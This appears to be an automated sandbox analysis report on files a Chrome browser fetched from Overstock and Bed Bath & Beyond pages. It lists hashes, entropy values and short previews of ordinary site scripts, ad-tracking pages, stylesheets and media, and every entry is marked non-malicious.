                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/ShopPayLoginLoader.DsmWyqS8.js
                                                                                                                                                                                    Preview:import{c as ne,aO as se,oM as z,cx as te,q as u,c0 as ie,h as I,oN as re,J as j,e as K,r as ce,l as G,m as le,cH as C,A as ue,o as he,bF as de,j0 as W,cF as me,iF as pe,bs as ge,T as F,ih as J,y as g,cI as Q,oO as V,oP as fe,a as o,ab as ye,bK as Se,hg as Pe,oQ as Le,oR as _e,he as be,bP as ke,V as q,hW as Ie,cK as Ce,fc as Te,j7 as we,O as Ae,Q as ve,bA as Ee,cM as b,f9 as x,hY as Oe,m8 as Me,E as h,ae as Re,a0 as De,a6 as Ne,v as Ue,oS as He}from"./app.DfgMZONA.js";import{a as ze,u as Y,b as Fe,p as Ve,S as xe,U as $e}from"./publishMessage.CX0yXme-.js";import{S as k,b as je,u as Ke}from"./Section.Dvvun2gq.js";const Ge=ne(!1);function We(){const a=se(),s=Object.keys(z).map(e=>[e,te[e]]),t=u(async()=>{s.forEach(([e,r])=>{a.write(r,z[e])})},[a,s]);return{shopPayLogout:Ge,resetShopPayParts:t}}const Je="_5Z70J",Qe={LoginIframe:Je},qe="shop-pay-login-iframe",Ye="100%",$="c1_login",Ze=250;function Be(){const a=ie(We().shopPayLogout),[s,t]=I(!0),[e,r]=I(Ze),c=re(),{progress:i}=j(),f=K(),d=ce
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):122268
                                                                                                                                                                                    Entropy (8bit):5.502187129008123
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:pnhFbd4Ab6iOZBak4fHcc+oLcaYBqmXkfNqtfOyy+bSNSyS804LGVr+pV64IEFdT:pnhFbd4Ab6iOZBak4fHcc+oLcaYBqmX+
                                                                                                                                                                                    MD5:35021B9E5FCF224AD72E8610D42C7732
                                                                                                                                                                                    SHA1:62E0B3F7E2E53D809E6BC291F255A26080D22C42
                                                                                                                                                                                    SHA-256:C56228D02A2B859FCC0C8015326EB9813AB48C42BEBC2AD7D192A63AF49471EC
                                                                                                                                                                                    SHA-512:01A971BA1A0B50133EF23D25CBA400320A1930AB126E0DDC0246614A486ED64B661E2325BA98AE35721711DC63F43B42BA26595F4C7CBFEF2BE5094E895E0104
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/1069816607?random=1730294606068&cv=11&fst=1730294606068&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za201&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_view
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":46656000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1585853498.1730294602","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1585853498.1730294602\u0026ig_key=1sNHMxNTg1ODUzNDk4LjE3MzAyOTQ2MDI!2saeodTw!3sAAptDV5wGBcS\u0026tag_eid=44800267","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1s_UN3RQ!2saeodTw!3sAAptDV5wGBcS","1i44800267"],"userBiddingSignals":[["7280788529","7281797089","7281796879","7280786213","7281796819","7282194600","7280788808","7281797023","59
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):287896
                                                                                                                                                                                    Entropy (8bit):5.559714573926358
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:WuwiztGbET0atoly0u5CptDY8/I8+yr/OUYhcDm6DcM8Gp/9LG:fGbgTtoqM/GUT9cM8Gp/9K
                                                                                                                                                                                    MD5:6B8FFC149F1D819F683BDE646C7F9EB2
                                                                                                                                                                                    SHA1:456C8A153296F31F91D51EE5A5CE6E7B95859C64
                                                                                                                                                                                    SHA-256:AB286285066A4BF2D1CB37D0F14C0006FCF4A3274146B7A2AB1CF75E43A9AE52
                                                                                                                                                                                    SHA-512:DF0B4DE72BB60B59D78D90EC9B6600D26B3CDC79302E0B8CCB783C92C02E39545F3AEE50B73E1522CAF6B2F58DE384EE67829440C396AC557C19A9E9762B041C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-11435964337","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_re
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                    Entropy (8bit):4.314128390879881
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:2erWeKBRk35KLWAzRERxzfXHqq/H4Y3:29M3tRdfaqN
                                                                                                                                                                                    MD5:2DEA9F0F7E122E81EE9A3752902BDF19
                                                                                                                                                                                    SHA1:8747D6D270E001CEEA1174FF1D365D9CDEA52DCD
                                                                                                                                                                                    SHA-256:3D49CCE674B56473177888E83BA3303C68B74AF8F0032A94F4814F73F59132B9
                                                                                                                                                                                    SHA-512:723AC6A0C7A4139882197D5E4B59A48DB20A83C63E498C8C5FA1E057DBA75F33A1F927CC286D006BF107A04211998873FCC82656B719C40D49F633C466F0CD8F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:event: message.data: {"response":{"status_code":400,"body":""}}..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65451)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):480564
                                                                                                                                                                                    Entropy (8bit):5.586242342957384
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:4irWVpSxWvnoOS6P2oox/35xSAwp+FKk1v9UdN243yScJBrqs9zWUN7DAtaFriz:4irWV4xWvnNyjULz
                                                                                                                                                                                    MD5:AAECB8102FDA237E7B9051A60E1770EF
                                                                                                                                                                                    SHA1:F43A7E6F1FE5889D93455D224FE27345A14F92CD
                                                                                                                                                                                    SHA-256:D4EAA8A575D4A340E2E5DEFEC8A9767133B5F916CD9E8CFEC939BCECEFFAC76A
                                                                                                                                                                                    SHA-512:D283F405CEC8BF9E2F887C059BC235B234C12CD84D437B4B2DAEF1068F293D5BBC6BBDD544632D5155B008C6289411197E8AA1056CF2520EA984F8B1E80646C8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*! For license information please see overstock-desktop-header.js.LICENSE.txt */.(()=>{var e={5892:function(e,t,n){"use strict";var o=this&&this.__awaiter||function(e,t,n,o){return new(n||(n=Promise))((function(r,i){function a(e){try{l(o.next(e))}catch(e){i(e)}}function s(e){try{l(o.throw(e))}catch(e){i(e)}}function l(e){var t;e.done?r(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(a,s)}l((o=o.apply(e,t||[])).next())}))},r=this&&this.__generator||function(e,t){var n,o,r,i,a={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return i={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function s(s){return function(l){return function(s){if(n)throw new TypeError("Generator is already executing.");for(;i&&(i=0,s[0]&&(a=0)),a;)try{if(n=1,o&&(r=2&s[0]?o.return:s[0]?o.throw||((r=o.return)&&r.call(o),0):o.next)&&!(r=r.call(o,s[1])).done)return r;switch(o=0,r&&(s=[2&s[0],r.value]),s[0]){case
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):17554
                                                                                                                                                                                    Entropy (8bit):7.951402850889774
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:TY/4ilcsPgVYRIud1xZeTm5Db0gsLElYXQ76LX6LSFunS:TYzlPgVY1DeTwDAg2Ey9rjuS
                                                                                                                                                                                    MD5:FE3D7DE3750BAD21C2AFB64AD830C44C
                                                                                                                                                                                    SHA1:CAAC56AE045C52C037E8BD14A12B8A5AA36F82DD
                                                                                                                                                                                    SHA-256:C585A99629A2BF7D159A0298F794A0AEB0BC401455F7BF67F0442220052AD849
                                                                                                                                                                                    SHA-512:B0F781D78073886205AF610C0D724D680E5728F945A93DD638815E66B6DEE9C8860F680D37C8DAD97A49448BEA90E71D04C9CC47B24868061D549988E5D5A2A6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/06272024-MOPS-Category-Rug.png?v=1719612969&width=320
                                                                                                                                                                                    Preview:RIFF.D..WEBPVP8X....8...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.......m.Ir...=."".1U.J.{.k/.GN...l..6...3....Uv..9..%ps~s.@..C..W....H.F..s.. H...b..R.A.f..y..Q3.>.........m.P.....q$....."9.W...&7D>.ki....x.cN....\f..l%. sff{....~R....i.?......)..b...@n..n...M.Q.'"F.0dP....zP...3........hW...G....HR$.DH...c..U?..T.H.-k.>Y.......s..N..g.k]k.m..|o...WW..\*...{*.$$.{.....\.f...3....M^h.|..;.Ix...).m=o.?.m..w.q...X.C...q<../N...f.V...W..u......pk..X..FG.`...!|..'>M...R.}.........c3..83D...3?5..sH]2*.v...F.u0.pF.....{.?...U...jwm......VvA..=.uF0..:..>...'......5...D'..C
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (832), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):832
                                                                                                                                                                                    Entropy (8bit):5.617754763451446
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:hnMQbwuOaxyCkv4AEHeWSa2SiTej1dYvTiUv2YwasqQv5DFQQ9BWdvWyAzDIxdP:hMiRO9q72S5jzYLDsqQV2vWrDIv
                                                                                                                                                                                    MD5:AD3E38A90E9ECC1D87BE610D59ED691F
                                                                                                                                                                                    SHA1:948DA19831F191A2045D7BE5E60E588F5832E18B
                                                                                                                                                                                    SHA-256:AD2BE281238D344B42E2679D5E1BD10E652E96834A7C7F6CBF3E82A23311BB59
                                                                                                                                                                                    SHA-512:24AD94D0A05B9097102242E50D4EDABD2E51C6CE9FE35F0478A9B552899C0B6CE193A1431E832351A85FE6C8B644EE9B6D22F5B660C566A1E43E5AB7611214DA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://14698185.fls.doubleclick.net/activityi;dc_pre=CI3nzcCZtokDFRWhgwcdn-YbtQ;src=14698185;type=overs0;cat=allsi0;ord=1;num=5210998244396;npa=0;auiddc=164462539.1730294546;ps=1;pcor=1177834650;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2F?
                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CI3nzcCZtokDFRWhgwcdn-YbtQ;src=14698185;type=overs0;cat=allsi0;ord=1;num=5210998244396;npa=0;auiddc=*;ps=1;pcor=1177834650;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2F"/></body></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2899
                                                                                                                                                                                    Entropy (8bit):7.255019467844342
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxqV9T1gdceh3P3IfQO2QifLtAO7lQEdIBIeR97DAT1COk:NBIl/XrxlPIY7ym7dIBJ/fOk
                                                                                                                                                                                    MD5:BD856903C32D96521E282478AD7820CE
                                                                                                                                                                                    SHA1:1D63706235DAAE56BE3FE5F7FBFD531B4BC70876
                                                                                                                                                                                    SHA-256:44114423DF334891300807149F3E29AFF75ABEE98924576E528B42C6B1D35E08
                                                                                                                                                                                    SHA-512:3CE3926DFDD6929D720FC922A7326B1B40CC5EF3A04C74A1E9A13AE46E71C304CC60992DE16C9E06C8585382EBF6315DFDE267CB0E13E55051156F0B0B985C79
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................\.j....+..F..:9<V...Klo.(.3L.1....Ce.~oE......\.>...F.1.z.$U/........K.0.. .....o..9...cn)A6.J.k.yS....v..M..S\...E.s........1i
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x1024, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):426476
                                                                                                                                                                                    Entropy (8bit):7.99137070974231
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:12288:TceC007lKb5X71A2VB52g1c8gZcniJYVMC3kD04wsKkq:wFJlixjVig1c8MrJRCs04rZq
                                                                                                                                                                                    MD5:7D9EA0F3E7CD614209B4A4F547ABC492
                                                                                                                                                                                    SHA1:34D4A16593F9F52464DEDD28ED7C91B9CF07C7E7
                                                                                                                                                                                    SHA-256:2269D487E6C1B84BDB0BD67F50854A258DC4F1A320380FDC5EA7BF9D93E15C9B
                                                                                                                                                                                    SHA-512:C733AFFC9C5652D13AC8349D845C27AB118B2A6B3810D6F06164410848B6EEFB9A029823985DCEB78CA93EB8A5CA70BFECE60182ED14F21606926185EB5B7567
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................................................!................................................................!..........."..........:.......................................................................h.FDt.)..FM.T..D.uA..}.W.!...P...tc..O......J.(Nb....)..Yc..~.8zbR.......`N....f.....|..S.a.F..l......}w ;.~.J....H....+6+Ru\.U.tK.v......d...N.#......".=).&O.......e.... .C.....5|<O.6.J%..F(....K.M.....)....A..'H..(F..I...0S.&.ez5..V......4..p..p.....yI.X1r......a.s.Hg..d......L....2... H.0.....t.3.Lp.e.pb.1..]...jA..K..A.Q?B.3...R....-.....B........lmv}".7.Za.|..2.d.....rf.l..^2.x.'6.u...|._.Z.;Ep....?...m. .....9........B`,...LKC...7....*.w9^..X....*5.a.Qb .....l...[.$...s.>Bp\lPW8!2!.8..5"..!Q..P.$+V..t..X&,.lX...%..H[.....a.....*H...$..ndd..L.Rg.E:.$."p.G. ..d.`..K..+6't4X`.X...".@)t%.V...T.D...i..10S/.Rq....6..K.......0..+^.D.4N.u.y>..}.V....N..;F.J.U2K..0.S..T...z...].n]$&v._.A.I..5n.>V.!.d.i.a..r.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, MP4 v2 [ISO 14496-14]
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1048576
                                                                                                                                                                                    Entropy (8bit):7.890736826939157
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:dLaRUzLv1KCU40KiSaF4F0VMxKxHgE9zznT/iSqx/NJ9:gyLkCUF/+REHHhzTrA5
                                                                                                                                                                                    MD5:7459C8C36CF47C62823D75FCD00EB8A9
                                                                                                                                                                                    SHA1:5474D932902F67EE3B2CB83843D7F7F0B9FDA089
                                                                                                                                                                                    SHA-256:29F9A9046D48D623617B2AA979BBF08BDD19D7956ADA8A0CD11A2486637548B1
                                                                                                                                                                                    SHA-512:4D9480D557FA0FBA73B3F5694D8A262455CAEFFD9C2F2151AFC87D6973B827510D802EB065AE6096A96E6E700CB77BB0CB3646FC90E866D86027377FFE5940DD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/video/homepage/10162024-MOPS-V3850x447_DesktopA1_2024_BBB_HomefortheHolidays_BKG_V2.mp4:2f8447e3ce2bbd:0
                                                                                                                                                                                    Preview:....ftypmp42....mp42mp41....moov...lmvhd.....5...5...._...J.................................................@...................................trak...\tkhd.....5...5............=`................................................@....&.........$edts....elst..........=`...........gmdia... mdhd.....5...5....u0... .......@hdlr........vide.............Mainconcept Video Media Handler....minf....vmhd...............3hdlr........alis............Alias Data Handler....$dinf....dref............url ........stbl....stsd............avc1.........................&...H...H.........AVC Coding............................2avcC.M......'M....`f..x.P.........w..|....(.. ....stts....................stsc........................stsz..............t...Y4.. ...k....+..l.......m@...........u..e\...s......"...x.......a@..............ae..........!....q..+h..c....D...H...M..l....+......#.......#...wP..........%...b....j...... %...7..%...rj...k...P.."...ux.......-.."...}...#...Wc...O..CE..Y........W..%....p..a....Z..J..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5454)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5553
                                                                                                                                                                                    Entropy (8bit):4.993371728186416
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:LE3J2dj7dF/n/Z/ydjdadYdsdQdKdMd8dNd0dodXDOd/d6dRdAdQdtd3dHedEdSy:hdj7dF/n/Z/ydjdadYdsdQdKdMd8dNdp
                                                                                                                                                                                    MD5:07286D909EDDFBF10E9817985FA863BB
                                                                                                                                                                                    SHA1:DEA9340694968B4B2FCE41F60DAEF51D36EB1FE6
                                                                                                                                                                                    SHA-256:50657CDB41FF0569C80984B00B239374C988BC8D26ED39E5B175BD8145569E2A
                                                                                                                                                                                    SHA-512:12C76552F04B12648645DA79E0ACA330307971CB9EF036B8F1AF96DD815C36F10DA2B91DE3DB865786EF9F0668DB3E20E0C5169B8F72C96B644707B79DCDF348
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/custom-css.css?v=80801450745420830931730157903
                                                                                                                                                                                    Preview:div#algolia-shopify-instantsearch .ais-SortBy select{-webkit-appearance:auto!important;appearance:auto!important}@media (max-width: 450px){div#algolia-shopify-instantsearch .ais-SortBy select{padding-right:0}}.grid.grid-carousel{display:flex;flex-wrap:wrap;padding:0;margin:0;list-style:none;column-gap:var(--grid-mobile-horizontal-spacing);row-gap:var(--grid-mobile-vertical-spacing)}@media (min-width: 750px){.grid{column-gap:var(--grid-desktop-horizontal-spacing);row-gap:var(--grid-desktop-vertical-spacing)}}.grid.grid-gapless{column-gap:0;row-gap:0}.grid-item{width:calc(25% - var(--grid-mobile-horizontal-spacing) * 3 / 4);max-width:calc(50% - var(--grid-mobile-horizontal-spacing) / 2);flex:none;list-style:none;padding:0}.grid-item>:last-child{margin-bottom:0}@media (min-width: 750px){.grid-item{width:calc(25% - var(--grid-desktop-horizontal-spacing) * 3 / 4);max-width:calc(50% - var(--grid-desktop-horizontal-spacing) / 2)}}@media (min-width: 750px) and (max-width: 1119px){.grid-one-thi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (42176), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):42176
                                                                                                                                                                                    Entropy (8bit):5.37134581215959
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:Qd2SDApEL6976NzFBqiHSOu7unHkjD3q4raM:Q8yL6976XAd
                                                                                                                                                                                    MD5:9EB064BF1582481052AF788EF36F63CE
                                                                                                                                                                                    SHA1:AB72B6BC776768C0B3949FD582CFF1D652A4C7FF
                                                                                                                                                                                    SHA-256:5426E2DDCC086D9C92B24B243115F14E483DCB842CC0EED09322078A7B29BB98
                                                                                                                                                                                    SHA-512:E7CDF561831E1962C92B0032F701BFDC1DD1E18A652323F4C3544C564290BDF1147D790655B05638F60FB4902B19E9BF8A4017A70AD2FB3DB98F7B2D9A1A0AD0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/css/0aa6b98441eac8ac.css
                                                                                                                                                                                    Preview:.MainStyles_main__KcwQn{max-width:1400px;margin:0 auto;display:flex;flex-direction:column;align-items:center;justify-content:center;overflow:hidden}.HeroStyles_Slide___SMEh{z-index:1;background-color:#f9fafb;overflow:hidden;position:absolute;top:0}.HeroStyles_SlideZeroI__4GdfY{position:relative}.HeroStyles_Link__nKRnE{display:block;position:relative;width:100%;overflow:hidden;text-decoration:none}.HeroStyles_Link__nKRnE:active,.HeroStyles_Link__nKRnE:focus,.HeroStyles_Link__nKRnE:hover{text-decoration:none}.HeroStyles_Wrapper__09m9_{position:relative;width:100%;text-align:center;overflow:hidden;-webkit-user-select:none;-ms-user-select:none;-moz-user-select:none;user-select:none}.HeroStyles_Content__1YZJz{display:flex}.HeroStyles_Image__5L0N6{width:100%;height:auto;display:block}.HeroStyles_Overlay__wOQOg{position:absolute;width:100%;top:0;left:0;z-index:1;display:block;height:100%}.HeroStyles_VideoContain__9SNkO{position:absolute;top:0;left:0;width:100%;height:auto;display:flex;align-i
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4544)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4642
                                                                                                                                                                                    Entropy (8bit):5.118788119437289
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:RHEdhTMJS9hW/5NOAh04v0pVsPRA5N72hY7PNGAl8Lcvp:RkdhcS94/5nh04+sS5ZPNGAlycR
                                                                                                                                                                                    MD5:FFE2F01879E5BAB4340780AA3DB14C47
                                                                                                                                                                                    SHA1:560500466B1A32D05D644B22FB4139CCC61C54B8
                                                                                                                                                                                    SHA-256:EAF91AE4532B49AEE87C7AA304D6F0E8FBC964CD3649BE237BB10EFA381A6F0A
                                                                                                                                                                                    SHA-512:17B00FA4991877B3F59CE9565B5AFC99CD7EAAA3D71AD7C3CE430DCEB9E21E08F8E41E0B83460C11022415654D640242BE86539E9A75053B83D79E8B218A8FDB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/product-form.js?v=162683462580992680541730157979
                                                                                                                                                                                    Preview:if(!customElements.get("product-form")){class ProductForm extends HTMLElement{constructor(){super(),this.hasChildNodes()&&this.init()}init(){this.form=this.querySelector(".js-product-form"),this.form&&(this.form.querySelector('[name="id"]').disabled=!1,this.cartDrawer=document.querySelector("cart-drawer"),this.submitBtn=this.querySelector('[name="add"]'),this.checkoutBtn=this.querySelector('[name="checkout"]'),this.goToCheckout=!1,theme.settings.afterAtc!=="no-js"&&this.addEventListener("submit",this.handleSubmit.bind(this)),this.checkoutBtn&&this.checkoutBtn.addEventListener("click",()=>{this.goToCheckout=!0}))}async handleSubmit(evt){if(evt.target.id==="product-signup_form"||(evt.preventDefault(),this.submitBtn.getAttribute("aria-disabled")==="true"))return;theme.settings.vibrateOnATC&&window.navigator.vibrate&&window.navigator.vibrate(100),this.errorMsg=null,this.setErrorMsgState(),this.submitBtn.setAttribute("aria-disabled","true"),this.submitBtn.classList.add("is-loading"),this.ch
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):263106
                                                                                                                                                                                    Entropy (8bit):5.570779147850245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:RqGbgBncookx63x0C8Gp/B2ntu9BW24nM:RbcncooyAEM
                                                                                                                                                                                    MD5:D2283A384C476842ED0C450A7935213C
                                                                                                                                                                                    SHA1:0678258C4D17CD09E77F91E06B9100F82A216253
                                                                                                                                                                                    SHA-256:4E337E60B3B744F2255E622B80F07712140B91C4923ABA695BA3B9F263DE8E56
                                                                                                                                                                                    SHA-512:EF6E990D262C4F6B660DA97C1CC1FD4EDEBE2CCAF2444FEA3D0B01D6DEC2FD300BA36AB05143251AEE2C2BF9425E95E2276EFA90DC7BB0F18C1F1C7C47CB531A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
